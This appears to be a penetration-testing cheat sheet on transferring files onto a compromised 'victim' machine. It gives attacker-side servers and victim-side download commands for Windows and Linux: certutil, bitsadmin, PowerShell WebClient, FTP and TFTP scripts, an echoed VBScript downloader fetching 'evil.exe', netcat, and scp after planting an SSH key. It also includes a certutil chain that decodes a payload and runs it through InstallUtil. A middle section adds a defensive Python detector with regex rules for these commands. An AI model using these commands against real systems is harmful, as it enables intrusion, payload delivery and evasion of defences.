Downloading/Transfer files

Download files to the victim machine

Simple Local Web Servers

| Command | Description |
| --- | --- |
| python -m SimpleHTTPServer 80 | Run a basic http server, great for serving up shells etc |
| python3 -m http.server | Run a basic Python3 http server, great for serving up shells etc |
| ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start" | Run a ruby webrick basic http server |
| php -S 0.0.0.0:80 | Run a basic PHP http server |

Updog

Link: https://github.com/sc0tfree/updog

Updog is a replacement for Python's SimpleHTTPServer. It allows uploading and downloading via HTTP/S, can set ad hoc SSL certificates and use http basic auth.

Install using pip:

pip3 install updog

Usage

updog [-d DIRECTORY] [-p PORT] [--password PASSWORD] [--ssl]

SMTP Server

Link: https://github.com/hackerscrolls/simplesmtp

Usage: go run simplesmtp.go -save -i 0.0.0.0 -p 25

Windows

curl

Since Windows 10 1809, curl is built in:

C:\Users\IEUser>curl.exe 
curl: try 'curl --help' for more information 
C:\Users\IEUser>curl.exe google.com/robots.txt 
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> 
<html><head> 
<title>301 Moved Permanently</title> 
</head><body> 
<h1>Moved Permanently</h1> 
<p>The document has moved <a href="http://www.google.com/robots.txt">here</a>.</p> 
<hr> 
</body></html> 
C:\Users\IEUser> 

wget

wget is an alias for Invoke-WebRequest in PowerShell:

PS C:\Users\Idan> wget google.com/robots.txt


StatusCode        : 200
StatusDescription : OK
Content           : User-agent: *
                    Disallow: /search
                    Allow: /search/about
                    Allow: /search/static
                    Allow: /search/howsearchworks
                    Disallow: /sdch
                    Disallow: /groups
                    Disallow: /index.html?
                    Disallow: /?
                    Allow: /?hl=
                    Disallow: /?...
RawContent        : HTTP/1.1 200 OK
                    Vary: Accept-Encoding
                    X-Content-Type-Options: nosniff
                    X-XSS-Protection: 0
                    Alt-Svc: quic=":443"; ma=2592000; v="46,43",h3-Q050=":443"; ma=2592000,h3-Q049=":443";
                    ma=2592000,h3-Q048=...
Forms             : {}
Headers           : {[Vary, Accept-Encoding], [X-Content-Type-Options, nosniff], [X-XSS-Protection, 0], [Alt-Svc,
                    quic=":443"; ma=2592000; v="46,43",h3-Q050=":443"; ma=2592000,h3-Q049=":443";
                    ma=2592000,h3-Q048=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443";
                    ma=2592000,h3-T050=":443"; ma=2592000]...}
Images            : {}
InputFields       : {}
Links             : {}
ParsedHtml        : mshtml.HTMLDocumentClass
RawContentLength  : 7004

View just content:

Invoke-WebRequest 'http://google.com/robots.txt' | Select-Object -Expand Content

PS iwr

iwr is an alias for Invoke-WebRequest:

iwr google.com/robots.txt

bitsadmin

Use bitsadmin to download via the command line on older versions of Windows (works from cmd.exe).

usage:

cmd.exe /c bitsadmin /transfer {JOB NAME} /download /priority normal {LINK} {DOWNLOAD LOCATION}

example:

bitsadmin /transfer debjob /download /priority normal http://cdimage.debian.org/debian-cd/current-live/i386/iso-hybrid/debian-live-8.7.1-i386-xfce-desktop.iso D:\Users\[Username]\Downloads\debian-live-8.7.1-i386-xfce-desktop.iso

credit: https://gist.github.com/rosswd/cad64650ca1b03bd1789a69edbeb586c

PS WebClient

(new-object System.Net.WebClient).DownloadFile('http://www.xyz.net/file.txt','C:\tmp\file.txt')

Certutil

You can download the file directly:

certutil.exe -urlcache -f http://192.168.0.1/file.exe file.exe

Or you can encode the file in base64 and then use certutil to decode it.

certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll

FTP

On a Linux host, start an FTP server:

apt-get install python3-pyftpdlib  
python3 -m pyftpdlib -p 21 -w

Or use metasploit:

msf > use auxiliary/server/ftp

On the victim, write the FTP commands to a file:

echo open 192.168.1.101 21> ftp.txt
echo USER N7WERA>> ftp.txt
echo NEWERA_PASSWORD>> ftp.txt
echo bin>> ftp.txt
echo GET winpease.exe>> ftp.txt
echo bye>> ftp.txt

Run from cmd or PowerShell (the Windows ftp client takes the script file as -s:filename):

ftp -s:ftp.txt

SMB Server

Start an SMB server on Kali (or any Linux) using impacket:

root@kali# smbserver.py -smb2support {SHARE NAME} {FOLDER TO SHARE} -username newera -password newera

From the victim:

C:\>net use \\10.11.0.XXX\smb /user:<username> <password>
The command completed successfully. 

Copy files:

C:\WINDOWS\Temp>copy \\10.11.0.XXX\smb\ms11-046.exe \windows\temp\a.exe 
copy \\10.11.0.XXX\smb\ms11-046.exe \windows\temp\a.exe 
        1 file(s) copied.

TFTP Server

Start TFTP on Kali:

service atftpd start
atftpd --daemon --port 69 /tftp

Download files from the victim:

tftp -i 192.168.0.1 GET winpeas.txt

VBScript

Here is a good script to make a wget-clone in VB.

If it doesn't work try piping it through unix2dos before copying it.

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

You then execute the script like this:

cscript wget.vbs http://192.168.10.5/evil.exe evil.exe

NC.exe

You can download a standalone compiled version of NC (Netcat) for Windows from the Nmap project (https://svn.nmap.org/nmap/ncat/), or use the Kali compiled version, located in:

/usr/share/windows-binaries/nc.exe

If you're able to move ncat to the victim, you can use the normal nc functions to transfer more files (or gain a shell).

On the attacker host:

nc 192.168.0.10 4444 < file.exe

On the victim:

ncat.exe -lvp 4444 > file.exe
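
From the defender's side, the Windows transfer commands in this section leave distinctive process command lines in Sysmon Event ID 1 or Security 4688 logs. The following is an added example, not part of the original page: the regexes, rule names, host names and sample events are all constructed for illustration.

```python
import re

# Detection rules written for this example: each maps a rule name to a
# case-insensitive regex over a process command line (e.g. Sysmon Event ID 1
# or Security 4688 with command-line auditing enabled).
RULES = {
    "certutil_urlcache_download": r"\bcertutil(\.exe)?\s.*[-/]urlcache\b",
    "certutil_decode": r"\bcertutil(\.exe)?\s.*[-/]decode\b",
    "bitsadmin_transfer": r"\bbitsadmin(\.exe)?\s.*/transfer\b",
    "powershell_webclient": r"system\.net\.webclient\)?\.downloadfile",
    "powershell_iwr_url": r"\b(invoke-webrequest|iwr)\s.*https?://",
    "ftp_script_mode": r"\bftp(\.exe)?\s+(.*\s)?-s[: ]",
    "tftp_get": r"\btftp(\.exe)?\s+-i\s+\S+\s+get\b",
    "cscript_downloader": r"\bcscript(\.exe)?\s+\S+\.vbs\s+https?://",
    "installutil_quiet_uninstall": r"\binstallutil(\.exe)?\s.*/logfile=\s.*/u\b",
}
COMPILED = {name: re.compile(rx, re.IGNORECASE) for name, rx in RULES.items()}

def match_rules(command_line):
    """Return the sorted names of all rules that fire on one command line."""
    return sorted(n for n, rx in COMPILED.items() if rx.search(command_line))

def triage(events):
    """Return (host, command_line, hits) for every event that fires a rule."""
    return [(host, cmd, hits) for host, cmd in events if (hits := match_rules(cmd))]

# Constructed sample events (host, command line); not real telemetry.
SAMPLE_EVENTS = [
    ("WS01", r"certutil.exe -urlcache -f http://192.168.0.1/file.exe file.exe"),
    ("WS01", r"certutil -decode payload.b64 payload.dll"),
    ("WS01", r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll"),
    ("WS02", r"bitsadmin /transfer debjob /download /priority normal http://example.test/a.iso D:\a.iso"),
    ("WS02", r"powershell -c (new-object System.Net.WebClient).DownloadFile('http://www.xyz.net/file.txt','C:\tmp\file.txt')"),
    ("WS02", r"powershell -c iwr http://192.168.0.1/file.exe -OutFile file.exe"),
    ("WS03", r"ftp -s:ftp.txt"),
    ("WS03", r"tftp -i 192.168.0.1 GET winpeas.txt"),
    ("WS03", r"cscript wget.vbs http://192.168.10.5/evil.exe evil.exe"),
    ("WS04", r"certutil -hashfile C:\tmp\file.txt SHA256"),  # benign: no rule fires
    ("WS04", r"ftp ftp.example.test"),                        # benign: interactive ftp
]

if __name__ == "__main__":
    for host, cmd, hits in triage(SAMPLE_EVENTS):
        print(f"{host}  {', '.join(hits)}  <-  {cmd}")
```

The Invoke-WebRequest and WebClient rules are noisy on administrator workstations, so scope them by parent process and destination. Command-line matching misses renamed binaries, so pair it with network telemetry for the same hosts.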

Linux

scp

A built-in SSH utility to transfer files. Once you have gained access to the victim, you can add your public key to .ssh/authorized_keys, or use credentials if found.

Using a public/private key: once the public key has been copied to the victim's .ssh folder, you can transfer files from the attacker to the victim by running:

scp -i id_rsa file.exe user@victim:/tmp/

The file will be transferred to the /tmp folder.

If you gained credentials, remove the -i id_rsa and log in with the same command as above.

wget

wget is used to download files to the victim. Run a web server on the attacker (the port is given explicitly because http.server defaults to 8000):

python3 -m http.server 8080

and download from the victim:

wget 192.168.0.1:8080/linenum.sh

curl

curl is used to view web server source code; we can download files by running:

 curl https://url -o output.file.name

ftp

Linux has a built-in ftp utility. First create a listener on the attacker host:

apt-get install python-pyftpdlib  
python -m pyftpdlib -p 21 -w

Or use metasploit:

msf > use auxiliary/server/ftp

and then connect from the victim using

ftp 192.168.0.1

nc

A lot of Unix systems have a built-in nc utility which can be used to transfer files, the same way as in Windows.

You can download a compiled version of nc for Unix from:

https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/ncat
